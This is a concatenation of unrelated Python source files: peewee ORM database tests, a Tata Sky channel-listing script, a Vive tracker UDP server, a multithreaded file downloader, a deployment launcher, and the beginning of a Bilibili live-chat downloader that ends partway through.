self.assertEqual(list(DeferredModel.select()), [])
deferred_db.init(None)
self.assertTrue(deferred_db.deferred)
# The connection was automatically closed.
self.assertTrue(deferred_db.is_closed())
class CatToy(TestModel):
description = TextField()
class Meta:
schema = 'huey'
@requires_postgresql
class TestSchemaNamespace(ModelTestCase):
requires = [CatToy]
def setUp(self):
with self.database:
self.execute('CREATE SCHEMA huey;')
super(TestSchemaNamespace, self).setUp()
def tearDown(self):
super(TestSchemaNamespace, self).tearDown()
with self.database:
self.execute('DROP SCHEMA huey;')
def test_schema(self):
toy = CatToy.create(description='fur mouse')
toy_db = CatToy.select().where(CatToy.id == toy.id).get()
self.assertEqual(toy.id, toy_db.id)
self.assertEqual(toy.description, toy_db.description)
class TestSqliteIsolation(ModelTestCase):
database = db_loader('sqlite3')
requires = [User]
def test_sqlite_isolation(self):
for username in ('u1', 'u2', 'u3'): User.create(username=username)
new_db = db_loader('sqlite3')
curs = new_db.execute_sql('SELECT COUNT(*) FROM users')
self.assertEqual(curs.fetchone()[0], 3)
self.assertEqual(User.select().count(), 3)
self.assertEqual(User.delete().execute(), 3)
with self.database.atomic():
User.create(username='u4')
User.create(username='u5')
# Second conn does not see the changes.
curs = new_db.execute_sql('SELECT COUNT(*) FROM users')
self.assertEqual(curs.fetchone()[0], 0)
# Third conn does not see the changes.
new_db2 = db_loader('sqlite3')
curs = new_db2.execute_sql('SELECT COUNT(*) FROM users')
self.assertEqual(curs.fetchone()[0], 0)
# Original connection sees its own changes.
self.assertEqual(User.select().count(), 2)
curs = new_db.execute_sql('SELECT COUNT(*) FROM users')
self.assertEqual(curs.fetchone()[0], 2)
class UniqueModel(TestModel):
name = CharField(unique=True)
class IndexedModel(TestModel):
first = CharField()
last = CharField()
dob = DateField()
class Meta:
indexes = (
(('first', 'last', 'dob'), True),
(('first', 'last'), False),
)
class Note(TestModel):
content = TextField()
ts = DateTimeField()
status = IntegerField()
class Meta:
table_name = 'notes'
class Person(TestModel):
first = CharField()
last = CharField()
email = CharField()
class Meta:
indexes = (
(('last', 'first'), False),
)
class TestIntrospection(ModelTestCase):
requires = [Category, User, UniqueModel, IndexedModel, Person]
def test_table_exists(self):
self.assertTrue(self.database.table_exists(User._meta.table_name))
self.assertFalse(self.database.table_exists('nuggies'))
def test_get_tables(self):
tables = self.database.get_tables()
required = set(m._meta.table_name for m in self.requires)
self.assertTrue(required.issubset(set(tables)))
UniqueModel._schema.drop_all()
tables = self.database.get_tables()
self.assertFalse(UniqueModel._meta.table_name in tables)
def test_get_indexes(self):
indexes = self.database.get_indexes('unique_model')
data = [(index.name, index.columns, index.unique, index.table)
for index in indexes
if index.name not in ('unique_model_pkey', 'PRIMARY')]
self.assertEqual(data, [
('unique_model_name', ['name'], True, 'unique_model')])
indexes = self.database.get_indexes('indexed_model')
data = [(index.name, index.columns, index.unique, index.table)
for index in indexes
if index.name not in ('indexed_model_pkey', 'PRIMARY')]
self.assertEqual(sorted(data), [
('indexed_model_first_last', ['first', 'last'], False,
'indexed_model'),
('indexed_model_first_last_dob', ['first', 'last', 'dob'], True,
'indexed_model')])
# Multi-column index where columns are in different order than declared
# on the table.
indexes = self.database.get_indexes('person')
data = [(index.name, index.columns, index.unique)
for index in indexes
if index.name not in ('person_pkey', 'PRIMARY')]
self.assertEqual(data, [
('person_last_first', ['last', 'first'], False)])
def test_get_columns(self):
columns = self.database.get_columns('indexed_model')
data = [(c.name, c.null, c.primary_key, c.table)
for c in columns]
self.assertEqual(data, [
('id', False, True, 'indexed_model'),
('first', False, False, 'indexed_model'),
('last', False, False, 'indexed_model'),
('dob', False, False, 'indexed_model')])
columns = self.database.get_columns('category')
data = [(c.name, c.null, c.primary_key, c.table)
for c in columns]
self.assertEqual(data, [
('name', False, True, 'category'),
('parent_id', True, False, 'category')])
def test_get_primary_keys(self):
primary_keys = self.database.get_primary_keys('users')
self.assertEqual(primary_keys, ['id'])
primary_keys = self.database.get_primary_keys('category')
self.assertEqual(primary_keys, ['name'])
@requires_models(Note)
def test_get_views(self):
def normalize_view_meta(view_meta):
sql_ws_norm = re.sub(r'\n\s+', ' ', view_meta.sql.strip('; '))
return view_meta.name, (sql_ws_norm
.replace('`peewee_test`.', '')
.replace('`notes`.', '')
.replace('`', ''))
def assertViews(expected):
# Create two sample views.
self.database.execute_sql('CREATE VIEW notes_public AS '
'SELECT content, ts FROM notes '
'WHERE status = 1 ORDER BY ts DESC')
self.database.execute_sql('CREATE VIEW notes_deleted AS '
'SELECT content FROM notes '
'WHERE status = 9 ORDER BY id DESC')
try:
views = self.database.get_views()
normalized = sorted([normalize_view_meta(v) for v in views])
self.assertEqual(normalized, expected)
# Ensure that we can use get_columns to introspect views.
columns = self.database.get_columns('notes_deleted')
self.assertEqual([c.name for c in columns], ['content'])
columns = self.database.get_columns('notes_public')
self.assertEqual([c.name for c in columns], ['content', 'ts'])
finally:
self.database.execute_sql('DROP VIEW notes_public;')
self.database.execute_sql('DROP VIEW notes_deleted;')
# Unfortunately, all databases seem to represent VIEW definitions
# differently internally.
if IS_SQLITE:
assertViews([
('notes_deleted', ('CREATE VIEW notes_deleted AS '
'SELECT content FROM notes '
'WHERE status = 9 ORDER BY id DESC')),
('notes_public', ('CREATE VIEW notes_public AS '
'SELECT content, ts FROM notes '
'WHERE status = 1 ORDER BY ts DESC'))])
elif IS_MYSQL:
assertViews([
('notes_deleted',
('select content AS content from notes '
'where status = 9 order by id desc')),
('notes_public',
('select content AS content,ts AS ts from notes '
'where status = 1 order by ts desc'))])
elif IS_POSTGRESQL:
assertViews([
('notes_deleted',
('SELECT notes.content FROM notes '
'WHERE (notes.status = 9) ORDER BY notes.id DESC')),
('notes_public',
('SELECT notes.content, notes.ts FROM notes '
'WHERE (notes.status = 1) ORDER BY notes.ts DESC'))])
elif IS_CRDB:
assertViews([
('notes_deleted',
('SELECT content FROM peewee_test.public.notes '
'WHERE status = 9 ORDER BY id DESC')),
('notes_public',
('SELECT content, ts FROM peewee_test.public.notes '
'WHERE status = 1 ORDER BY ts DESC'))])
@requires_models(User, Tweet, Category)
def test_get_foreign_keys(self):
foreign_keys = self.database.get_foreign_keys('tweet')
data = [(fk.column, fk.dest_table, fk.dest_column, fk.table)
for fk in foreign_keys]
self.assertEqual(data, [
('user_id', 'users', 'id', 'tweet')])
foreign_keys = self.database.get_foreign_keys('category')
data = [(fk.column, fk.dest_table, fk.dest_column, fk.table)
for fk in foreign_keys]
self.assertEqual(data, [
('parent_id', 'category', 'name', 'category')])
class TestSortModels(BaseTestCase):
def test_sort_models(self):
class A(Model):
pass
class B(Model):
a = ForeignKeyField(A)
class C(Model):
b = ForeignKeyField(B)
class D(Model):
c = ForeignKeyField(C)
class E(Model):
pass
models = [A, B, C, D, E]
for list_of_models in permutations(models):
sorted_models = sort_models(list_of_models)
self.assertEqual(sorted_models, models)
class TestDBProxy(BaseTestCase):
def test_proxy_context_manager(self):
db = Proxy()
class User(Model):
username = TextField()
class Meta:
database = db
self.assertRaises(AttributeError, User.create_table)
sqlite_db = SqliteDatabase(':memory:')
db.initialize(sqlite_db)
User.create_table()
with db:
self.assertFalse(db.is_closed())
self.assertTrue(db.is_closed())
def test_db_proxy(self):
db = Proxy()
class BaseModel(Model):
class Meta:
database = db
class User(BaseModel):
username = TextField()
class Tweet(BaseModel):
user = ForeignKeyField(User, backref='tweets')
message = TextField()
sqlite_db = SqliteDatabase(':memory:')
db.initialize(sqlite_db)
self.assertEqual(User._meta.database.database, ':memory:')
self.assertEqual(Tweet._meta.database.database, ':memory:')
self.assertTrue(User._meta.database.is_closed())
self.assertTrue(Tweet._meta.database.is_closed())
sqlite_db.connect()
self.assertFalse(User._meta.database.is_closed())
self.assertFalse(Tweet._meta.database.is_closed())
sqlite_db.close()
def test_proxy_decorator(self):
db = DatabaseProxy()
@db.connection_context()
def with_connection():
self.assertFalse(db.is_closed())
@db.atomic()
def with_transaction():
self.assertTrue(db.in_transaction())
@db.manual_commit()
def with_manual_commit():
self.assertTrue(db.in_transaction())
db.initialize(SqliteDatabase(':memory:'))
with_connection()
self.assertTrue(db.is_closed())
with_transaction()
self.assertFalse(db.in_transaction())
with_manual_commit()
self.assertFalse(db.in_transaction())
class Data(TestModel):
key = TextField()
value = TextField()
class Meta:
schema = 'main'
class TestAttachDatabase(ModelTestCase):
database = db_loader('sqlite3')
requires = [Data]
def test_attach(self):
database = self.database
Data.create(key='k1', value='v1')
Data.create(key='k2', value='v2')
# Attach an in-memory cache database.
database.attach(':memory:', 'cache')
# Clone data into the in-memory cache.
class CacheData(Data):
class Meta:
schema = 'cache'
self.assertFalse(CacheData.table_exists())
CacheData.create_table(safe=False)
self.assertTrue(CacheData.table_exists())
(CacheData
.insert_from(Data.select(), fields=[Data.id, Data.key, Data.value])
.execute())
# Update the source data.
query = Data.update({Data.value: Data.value + '-x'})
self.assertEqual(query.execute(), 2)
# Verify the source data was updated.
query = Data.select(Data.key, Data.value).order_by(Data.key)
self.assertSQL(query, (
'SELECT "t1"."key", "t1"."value" '
'FROM "main"."data" AS "t1" '
'ORDER BY "t1"."key"'), [])
self.assertEqual([v for k, v in query.tuples()], ['v1-x', 'v2-x'])
# Verify the cached data reflects the original data, pre-update.
query = (CacheData
.select(CacheData.key, CacheData.value)
.order_by(CacheData.key))
self.assertSQL(query, (
'SELECT "t1"."key", "t1"."value" '
'FROM "cache"."cache_data" AS "t1" '
'ORDER BY "t1"."key"'), [])
self.assertEqual([v for k, v in query.tuples()], ['v1', 'v2'])
database.close()
# On re-connecting, the in-memory database will re-attached.
database.connect()
# Cache-Data table does not exist.
self.assertFalse(CacheData.table_exists())
# Double-check the sqlite master table.
curs = database.execute_sql('select * from cache.sqlite_master;')
self.assertEqual(curs.fetchall(), [])
# Because it's in-memory, the table needs to be re-created.
CacheData.create_table(safe=False)
self.assertEqual(CacheData.select().count(), 0)
# Original data is still there.
self.assertEqual(Data.select().count(), 2)
def test_attach_detach(self):
database = self.database
Data.create(key='k1', value='v1')
Data.create(key='k2', value='v2')
# Attach an in-memory cache database.
database.attach(':memory:', 'cache')
curs = database.execute_sql('select * from cache.sqlite_master')
self.assertEqual(curs.fetchall(), [])
self.assertFalse(database.attach(':memory:', 'cache'))
self.assertRaises(OperationalError, database.attach, 'foo.db', 'cache')
self.assertTrue(database.detach('cache'))
self.assertFalse(database.detach('cache'))
self.assertRaises(OperationalError, database.execute_sql,
'select * from cache.sqlite_master')
def test_sqlite_schema_support(self):
class CacheData(Data):
class Meta:
schema = 'cache'
# Attach an in-memory cache database and create the cache table.
self.database.attach(':memory:', 'cache')
CacheData.create_table()
tables = self.database.get_tables()
self.assertEqual(tables, ['data'])
tables = self.database.get_tables(schema='cache')
self.assertEqual(tables, ['cache_data'])
class TestDatabaseConnection(DatabaseTestCase):
def test_is_connection_usable(self):
# Ensure a connection is open.
conn = self.database.connection()
self.assertTrue(self.database.is_connection_usable())
self.database.close()
self.assertFalse(self.database.is_connection_usable())
self.database.connect()
self.assertTrue(self.database.is_connection_usable())
@requires_postgresql
def test_is_connection_usable_pg(self):
self.database.execute_sql('drop table if exists foo')
self.database.execute_sql('create table foo (data text not null)')
self.assertTrue(self.database.is_connection_usable())
with self.assertRaises(IntegrityError):
self.database.execute_sql('insert into foo (data) values (NULL)')
self.assertFalse(self.database.is_closed())
self.assertFalse(self.database.is_connection_usable())
self.database.rollback()
self.assertTrue(self.database.is_connection_usable())
curs = self.database.execute_sql('select * from foo')
self.assertEqual(list(curs), [])
self.database.execute_sql('drop table foo')
class TestExceptionWrapper(ModelTestCase):
database = get_in_memory_db()
requires = [User]
def test_exception_wrapper(self):
exc = None
try:
User.create(username=None)
except IntegrityError as e:
exc = e
if exc is None: raise Exception('expected integrity error not raised')
self.assertTrue(exc.orig.__module__ != 'peewee')
|
allChannels.py
|
### Script to get all channels from tata sky
import threading
import requests
import json as json
API_BASE_URL = "https://kong-tatasky.videoready.tv/"
channel_list = []
def getChannelInfo(channelId):
url = "{}content-detail/pub/api/v1/channels/{}".format(API_BASE_URL, channelId)
x = requests.get(url)
channel_meta = x.json()['data']['meta'][0]
channel_detail_dict = x.json()['data']['detail']
onechannl = {
"channel_id": str(channelId),
"channel_name": channel_meta.get('channelName', ''),
"channel_license_url": channel_detail_dict.get('dashWidewineLicenseUrl', ''),
"channel_url": channel_detail_dict.get('dashWidewinePlayUrl', ''),
"channel_entitlements": channel_detail_dict.get('entitlements', ''),
"channel_logo": channel_meta.get('channelLogo', ''),
"channel_genre": channel_meta.get('primaryGenre',"")
}
channel_list.append(onechannl)
def saveChannelsToFile():
print(len(channel_list))
with open("allChannels.json", "w") as channel_list_file:
json.dump(channel_list, channel_list_file)
channel_list_file.close()
def processChnuks(channel_lists):
for channel in channel_lists:
print("Getting channelId:{}".format(channel.get('id', '')))
channel_id = str(channel.get('id', ''))
getChannelInfo(channel_id)
def getAllChannels():
ts = []
url = API_BASE_URL + "content-detail/pub/api/v1/channels?limit=534"
x = requests.get(url)
channel_list = x.json()['data']['list']
print("Total Channels fetched:", len(channel_list))
print("Fetching channel info..........")
for i in range(0, len(channel_list), 5):
t = threading.Thread(target=processChnuks, args=([channel_list[i:i + 5]]))
ts.append(t)
t.start()
for t in ts:
t.join()
print("Saving all to a file.... " + str(len(channel_list)))
saveChannelsToFile()
if __name__ == '__main__':
getAllChannels()
|
vive_tracker_server.py
|
"""
OpenVr based Vive tracker server
"""
import argparse
import json
import logging
import logging.handlers
import socket
from multiprocessing import Queue, Process, Pipe
from pathlib import Path
from typing import List
from typing import Optional
import yaml
import numpy as np
import scipy.spatial.transform as transform
import time
import os
from base_server import Server
from gui import GuiManager
from models import ViveDynamicObjectMessage, ViveStaticObjectMessage, Configuration
from triad_openvr import TriadOpenVR
def construct_socket_msg(data: ViveDynamicObjectMessage) -> str:
"""
Send vive tracker message to socket
Args:
data: ViveTracker Message to send
Returns:
message in string to send
"""
json_data = json.dumps(data.json(), sort_keys=False)
json_data = "&" + json_data
json_data = json_data + "\r" # * (512 - len(json_data))
return json_data
class ViveTrackerServer(Server):
"""
Defines a UDP vive tracker server that constantly "shout out" messages at (HOST, PORT)
Utilizes OpenVR as its interaction with SteamVR. For hardware setup, please see this tutorial:
http://help.triadsemi.com/en/articles/836917-steamvr-tracking-without-an-hmd
"""
def __init__(self, port: int, pipe: Pipe, logging_queue: Queue,
config_path: Path = Path(f"~/vive_ros2/config.yml").expanduser(),
use_gui: bool = False, buffer_length: int = 1024, should_record: bool = False,
output_file_path: Path = Path(f"~/vive_ros2/data/RFS_track.txt").expanduser()):
"""
Initialize socket and OpenVR
Args:
port: desired port to open
logging_queue: handler with where to send logs
buffer_length: maximum buffer (tracker_name) that it can listen to at once
should_record: should record data or not
output_file_path: output file's path
"""
super(ViveTrackerServer, self).__init__(port)
self.logger = logging.getLogger("ViveTrackerServer")
self.logger.addHandler(logging.handlers.QueueHandler(logging_queue))
self.logger.setLevel(logging.INFO)
self.pipe = pipe
self.use_gui = use_gui
self.config_path = config_path
self.config = Configuration()
# load the configuration if one exists otherwise create one and set defaults
if not self.config_path.exists():
os.makedirs(os.path.dirname(self.config_path))
with open(self.config_path, 'w') as f:
yaml.dump(self.config.dict(), f)
else:
with open(self.config_path, 'r') as f:
data = yaml.load(f, Loader=yaml.FullLoader)
self.config = self.config.parse_obj(data)
self.socket = self.initialize_socket()
self.triad_openvr: Optional[TriadOpenVR] = None
self.reconnect_triad_vr()
self.should_record = should_record
self.output_file_path = output_file_path
self.output_file = None
if not self.output_file_path.exists():
self.output_file_path.parent.mkdir(parents=True, exist_ok=True)
self.output_file = self.output_file_path.open('w')
self.buffer_length = buffer_length
def run(self):
"""
Initialize a server that runs forever.
This server can be put into a multi-process module to run concurrently with other servers.
This server will listen for client's request for a specific tracker's name
It will compute that tracker's information
It will then send that information
Returns:
None
"""
self.logger.info(f"Starting server at {self.ip}:{self.port}")
self.logger.info("Connected VR devices: \n###########\n" + str(self.triad_openvr) + "###########")
# Main server loop
while True:
messages = {"state": {}}
# Transmit data over the network
try:
tracker_name, addr = self.socket.recvfrom(self.buffer_length)
tracker_name = tracker_name.decode()
tracker_key = self.resolve_name_to_key(tracker_name)
if tracker_key in self.get_tracker_keys():
message = self.poll_tracker(tracker_key=tracker_key)
messages["state"][tracker_key] = message
if message is not None:
socket_message = construct_socket_msg(data=message)
self.socket.sendto(socket_message.encode(), addr)
if self.should_record:
self.record(data=message)
else:
self.logger.error(f"Tracker {tracker_name} with key {tracker_key} not found")
except socket.timeout:
self.logger.info("Did not receive connection from client")
except Exception as e:
self.logger.error(e)
# See if any commands have been sent from the gui
while self.pipe.poll():
data = self.pipe.recv()
if "config" in data:
self.config = data["config"]
self.logger.info(f"Configuration updated")
if "save" in data:
self.save_config(data["save"])
if "refresh" in data:
self.logger.info("Refreshing system")
self.reconnect_triad_vr()
if "calibrate" in data:
self.calibrate_world_frame(*data["calibrate"])
# Update the GUI
if self.use_gui:
# Make sure all trackers are shown in the GUI regardless of if they are being subscribed to
for tracker_key in self.get_tracker_keys():
if tracker_key not in messages["state"]:
message = self.poll_tracker(tracker_key=tracker_key)
if message is not None:
messages["state"][tracker_key] = message
for reference_key in self.get_tracking_reference_keys():
if reference_key not in messages["state"]:
message = self.poll_tracking_reference(tracking_reference_key=reference_key)
if message is not None:
messages["state"][reference_key] = message
# Always send the current configuration to ensure synchronization with GUI
messages["config"] = self.config
self.pipe.send(messages)
def resolve_name_to_key(self, name):
"""
Takes in a name that is either assigned to a device serial number
or a key. Note that the name should not resemble the keys automatically assigned
to devices.
"""
keys = list(self.config.name_mappings.keys())
values = list(self.config.name_mappings.values())
for i in range(len(values)):
if values[i] == name:
serial = keys[i]
for device_key in self.get_device_keys():
if self.get_device(device_key).get_serial() == serial:
return device_key
return keys[i]
return name
def clear_calibration(self):
self.config.Twv_x = float(0)
self.config.Twv_y = float(0)
self.config.Twv_z = float(0)
self.config.Twv_qx = float(0)
self.config.Twv_qy = float(0)
self.config.Twv_qz = float(0)
self.config.Twv_qw = float(1)
def set_config_calibration_from_matrix(self, T):
q = transform.Rotation.from_matrix(T[:3, :3]).as_quat() # x y z w
t = T[:3, 3]
self.config.Twv_x = float(t[0])
self.config.Twv_y = float(t[1])
self.config.Twv_z = float(t[2])
self.config.Twv_qx = float(q[0])
self.config.Twv_qy = float(q[1])
self.config.Twv_qz = float(q[2])
self.config.Twv_qw = float(q[3])
def calibrate_world_frame(self, origin: str, pos_x: str, pos_y: str, duration: float = 2.0):
self.clear_calibration()
origin_key = self.resolve_name_to_key(origin)
pos_x_key = self.resolve_name_to_key(pos_x)
pos_y_key = self.resolve_name_to_key(pos_y)
origin_history = []
pos_x_history = []
pos_y_history = []
start = time.time()
while time.time() - start < duration:
origin_message = self.poll_tracker(origin_key)
pos_x_message = self.poll_tracker(pos_x_key)
pos_y_message = self.poll_tracker(pos_y_key)
origin_history.append(np.array([origin_message.x, origin_message.y, origin_message.z]))
pos_x_history.append(np.array([pos_x_message.x, pos_x_message.y, pos_x_message.z]))
pos_y_history.append(np.array([pos_y_message.x, pos_y_message.y, pos_y_message.z]))
avg_origin = np.average(np.array(origin_history), axis=0)
avg_pos_x = np.average(np.array(pos_x_history), axis=0)
avg_pos_y = np.average(np.array(pos_y_history), axis=0)
vx = avg_pos_x - avg_origin
vy = avg_pos_y - avg_origin
vx /= np.linalg.norm(vx)
vy /= np.linalg.norm(vy)
vz = np.cross(vx, vy)
m_rot = np.array([[*vx, 0],
[*vy, 0],
[*vz, 0],
[0, 0, 0, 1]])
m_pos = np.array([[1, 0, 0, -avg_origin[0]],
[0, 1, 0, -avg_origin[1]],
[0, 0, 1, -avg_origin[2]],
[0, 0, 0, 1]])
self.set_config_calibration_from_matrix(m_rot @ m_pos)
def save_config(self, path: Path = None):
path = path or self.config_path # default to self.config_path is path is None
self.logger.info(f"Saving configuration to {path}")
with open(path, 'w') as f:
yaml.dump(self.config.dict(), f)
self.logger.info(f"Configuration saved successfully!")
def poll_tracker(self, tracker_key) -> Optional[ViveDynamicObjectMessage]:
"""
Polls tracker message by name
Note:
Server will attempt to reconnect if tracker name is not found.
Args:
tracker_key: the vive tracker message intended to poll
Returns:
ViveTrackerMessage if tracker is found, None otherwise.
"""
tracker = self.get_device(key=tracker_key)
if tracker is not None:
message: Optional[ViveDynamicObjectMessage] = self.create_dynamic_message(device=tracker,
device_key=tracker_key)
return message
else:
self.reconnect_triad_vr()
return None
def poll_controller(self, controller_key) -> Optional[ViveDynamicObjectMessage]:
"""
Polls controller message by name
Note:
Server will attempt to reconnect if tracker name is not found.
Args:
controller_key: the vive tracker message intended to poll
Returns:
ViveTrackerMessage if tracker is found, None otherwise.
"""
controller = self.get_device(key=controller_key)
if controller is not None:
message: Optional[ViveDynamicObjectMessage] = self.create_dynamic_message(device=controller,
device_key=controller_key)
return message
else:
self.reconnect_triad_vr()
return None
def poll_tracking_reference(self, tracking_reference_key) -> Optional[ViveStaticObjectMessage]:
"""
Polls tracking reference message by name
Note:
Server will attempt to reconnect if tracker name is not found.
Args:
tracking_reference_key: the vive tracking reference intended to poll
Returns:
ViveTrackerMessage if tracker is found, None otherwise.
"""
tracking_reference = self.get_device(key=tracking_reference_key)
if tracking_reference is not None:
message: Optional[ViveStaticObjectMessage] = self.create_static_message(device=tracking_reference,
device_key=tracking_reference_key)
return message
else:
self.reconnect_triad_vr()
return None
def get_device(self, key):
"""
Given tracker name, find the tracker instance
Args:
key: desired tracker's name to find
Returns:
tracker instance if found, None otherwise
"""
return self.triad_openvr.devices.get(key, None)
def get_rot_vw(self) -> transform.Rotation:
"""Get the rotation from the vive frame to the world frame"""
return transform.Rotation.from_quat([self.config.Twv_qx,
self.config.Twv_qy,
self.config.Twv_qz,
self.config.Twv_qw])
def get_rot_wv(self) -> transform.Rotation:
"""Get the rotation from the world frame to the vive frame"""
return transform.Rotation.from_quat([self.config.Twv_qx,
self.config.Twv_qy,
self.config.Twv_qz,
self.config.Twv_qw]).inverse()
def translate_to_origin(self, x, y, z):
return x + self.config.Twv_x, y + self.config.Twv_y, z + self.config.Twv_z
def create_dynamic_message(self, device, device_key) -> Optional[ViveDynamicObjectMessage]:
"""
Create dynamic object message given device and device name
Note:
it will attempt to reconnect to OpenVR if conversion or polling from device went wrong.
Args:
device: tracker instance
device_key: the device's name corresponding to this tracker
Returns:
Vive dynamic message if this is a successful conversion, None otherwise
"""
try:
_, _, _, r, p, y = device.get_pose_euler()
x, y, z, qw, qx, qy, qz = device.get_pose_quaternion()
vel_x, vel_y, vel_z = device.get_velocity()
p, q, r = device.get_angular_velocity()
# handle world transform
rot_vw = self.get_rot_vw()
x, y, z = rot_vw.apply([x, y, z])
x, y, z = self.translate_to_origin(x, y, z)
# bring velocities into the local device frame such that positive x is pointing out the USB port
rot_lv = transform.Rotation.from_quat([qx, qy, qz, qw]) * transform.Rotation.from_matrix([[0, 1, 0],
[1, 0, 0],
[0, 0, -1]])
vel_x, vel_y, vel_z = rot_lv.apply([vel_x, vel_y, vel_z], inverse=True)
p, q, r = rot_lv.apply([p, q, r], inverse=True)
qx, qy, qz, qw = rot_lv.inv().as_quat()
serial = device.get_serial()
device_name = device_key if serial not in self.config.name_mappings else self.config.name_mappings[serial]
message = ViveDynamicObjectMessage(valid=True, x=x, y=y, z=z,
qx=qx, qy=qy, qz=qz, qw=qw,
vel_x=vel_x, vel_y=vel_y, vel_z=vel_z,
p=p, q=q, r=r,
device_name=device_name,
serial_num=serial)
return message
except OSError as e:
self.logger.error(f"OSError: {e}. Need to restart Vive Tracker Server")
self.reconnect_triad_vr()
except Exception as e:
self.logger.error(f"Exception {e} has occurred, this may be because device {device} "
f"is either offline or malfunctioned")
self.reconnect_triad_vr()
return None
def create_static_message(self, device, device_key) -> Optional[ViveStaticObjectMessage]:
"""
Create tracker message given device and device name
Note:
it will attempt to reconnect to OpenVR if conversion or polling from tracker went wrong.
Args:
device: device instance
device_key: the device's name corresponding to this tracker
Returns:
Vive static message if this is a successful conversion, None otherwise
"""
try:
x, y, z, qw, qx, qy, qz = device.get_pose_quaternion()
x, y, z = self.get_rot_vw().apply([x, y, z])
x, y, z = self.translate_to_origin(x, y, z)
serial = device.get_serial()
device_name = device_key if serial not in self.config.name_mappings else self.config.name_mappings[serial]
message = ViveStaticObjectMessage(valid=True, x=x, y=y, z=z,
qx=qx, qy=qy, qz=qz, qw=qw,
device_name=device_name,
serial_num=serial)
return message
except OSError as e:
self.logger.error(f"OSError: {e}. Need to restart Vive Tracker Server")
self.reconnect_triad_vr()
except Exception as e:
self.logger.error(f"Exception {e} has occurred, this may be because device {device} "
f"is either offline or malfunctioned")
self.reconnect_triad_vr()
return None
def reconnect_triad_vr(self, debug=False):
"""
Attempt to reconnect to TriadOpenVR
Notes:
this method will automatically assign self.triad_openvr
Args:
debug: **deprecated flag
Returns:
openvr instance
"""
del self.triad_openvr
self.triad_openvr = TriadOpenVR()
if debug:
self.logger.debug(
f"Trying to reconnect to OpenVR to refresh devices. "
f"Devices online:")
self.logger.info(self.triad_openvr.devices)
def get_tracker_keys(self) -> List[str]:
"""
Get a list of trackers
Returns:
list of tracker names
"""
return self.get_device_keys(filters=["tracker"])
def get_tracking_reference_keys(self) -> List[str]:
"""
Get a list of tracking references (base stations)
Returns:
list of references names
"""
return self.get_device_keys(filters=["reference"])
def get_controller_keys(self) -> List[str]:
"""
Get a list of controllers
Returns:
list of controller names
"""
return self.get_device_keys(filters=["controller"])
def get_device_keys(self, filters=None) -> List[str]:
result = []
for device_name in self.triad_openvr.devices.keys():
if filters is None:
result.append(device_name)
else:
for s in filters:
if s in device_name:
result.append(device_name)
return result
def record(self, data: ViveDynamicObjectMessage):
"""
Record the current data
Args:
data: current ViveTrackerMessage to record
Returns:
None
"""
x, y, z, qw, qx, qy, qz = data.x, data.y, data.z, data.qw, data.qx, data.qy, data.qz
recording_data = f"{x}, {y},{z},{qw},{qx},{qy},{qz}"
m = f"Recording: {recording_data}"
self.logger.info(m)
self.output_file.write(recording_data + "\n")
def run_server(port: int, pipe: Pipe, logging_queue: Queue, config: Path, use_gui: bool, should_record: bool = False):
vive_tracker_server = ViveTrackerServer(port=port, pipe=pipe, logging_queue=logging_queue, use_gui=use_gui,
config_path=config, should_record=should_record)
vive_tracker_server.run()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Vive tracker server')
parser.add_argument('--headless', default=False, help='if true will not run the gui')
parser.add_argument('--port', default=8000, help='port to broadcast tracker data on')
parser.add_argument('--config', default=f"~/vive_ros2/config.yml",
help='tracker configuration file')
args = parser.parse_args()
logger_queue = Queue()
gui_conn, server_conn = Pipe()
config = Path(args.config).expanduser()
string_formatter = logging.Formatter(fmt='%(asctime)s|%(name)s|%(levelname)s|%(message)s', datefmt="%H:%M:%S")
if args.headless:
p = Process(target=run_server, args=(args.port, server_conn, logger_queue, config, False,))
p.start()
try:
# This should be updated to be a bit cleaner
while True:
print(string_formatter.format(logger_queue.get()))
finally:
p.kill()
else:
p = Process(target=run_server, args=(args.port, server_conn, logger_queue, config, True,))
p.start()
try:
gui = GuiManager(gui_conn, logger_queue)
gui.start()
finally:
p.kill()
|
downl.py
|
import threading
from multiprocessing import cpu_count
import cusconf
import requests
config = cusconf.getconfig()
baseheader = {
'User-Agent': config['ua'],
'accept-encoding': 'gzip',
'cookie': config['cookie']
}
def Handler(start, end, url, filename):
cushander = {'Range': 'bytes=%d-%d' % (start, end)}
headers = {**baseheader, **cushander}
r = requests.get(url, headers=headers, stream=True)
with open(filename, "r+b") as fp:
fp.seek(start)
var = fp.tell()
fp.write(r.content)
def download(url, path):
num_thread = cpu_count()
r = requests.head(url)
print(r.headers['Transfer-Encoding'])
try:
file_size = int(r.headers['content-length'])
except:
print("Not surpport.")
return
# create file
fp = open(path, "wb")
fp.truncate(file_size)
fp.close()
# 启动多线程写文件
part = file_size // num_thread
for i in range(num_thread):
start = part * i
if i == num_thread - 1:
end = file_size
else:
end = start + part
t = threading.Thread(target=Handler, kwargs={'start': start, 'end': end, 'url': url, 'filename': path})
t.setDaemon(True)
t.start()
# all thread done
main_thread = threading.current_thread()
for t in threading.enumerate():
if t is main_thread:
continue
t.join()
|
mesh_release.py
|
# -*- coding: utf-8 -*-
from base.log import *
import os
from multiprocessing import Process
import redis_pool
def gen_id():
r = redis_pool.get('dornaemon')
return r.incr('deploy_id')
def do(release_path, deploy_id):
log_path = 'html/deploy_logs/%d.txt' % deploy_id
cmd = "python /home/op/mesh_deploy_5.80/no_cat_release.py %s > %s 2>&1" % (release_path, log_path)
logger().info('cmd:%s', cmd)
if 0 != os.system(cmd):
msg = '[Finish] Failed to deploy [%s]' % deploy_id
else:
msg = '[Finish] Success to deploy [%s]' % deploy_id
logger().error(msg)
open(log_path, 'a').write(msg)
def start(release_path):
deploy_id = gen_id()
p = Process(target=do, args=(release_path, deploy_id))
p.start()
logger().info('start deploy [%s]', deploy_id)
return deploy_id
def status(deploy_id):
log_path = 'html/deploy_logs/%s.txt' % deploy_id
content = open(log_path).read()
return content
def main():
deploy_id = start('/mnt/data1/release')
while True:
time.sleep(1)
#print status(deploy_id)
if __name__ == '__main__':
main()
|
chat.py
|
import websocket
import json
import logging
import asyncio
from threading import Thread
from threading import Event
from realtime_chat.bilibili import blivedm
from realtime_chat.bilibili import common
from realtime_chat.chats import Chat
from realtime_chat.chats import Chats
class ChatDownloader(object):
"""docstring for ChatDownloader"""
def __init__(self):
super(ChatDownloader, self).__init__()
self.__chats = Chats()
@property
def chats(self):
return self.__chats.chats
def get_room_id(self, url):
short_id = [p for p in url.split('/') if p != ''][-1]
data = common.getRoomInfo(short_id)
self.short_id = short_id
return data['data']['room_id']
def isLive(self):
data = common.getRoomInfo(self.short_id)
